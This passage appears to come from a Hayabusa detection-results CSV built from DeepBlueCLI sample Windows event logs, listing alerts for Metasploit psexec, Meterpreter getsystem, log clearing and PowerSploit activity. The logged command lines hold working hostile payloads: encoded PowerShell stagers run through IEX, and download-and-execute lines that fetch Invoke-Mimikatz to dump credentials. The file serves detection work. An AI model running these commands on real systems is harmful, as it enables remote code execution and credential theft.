IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
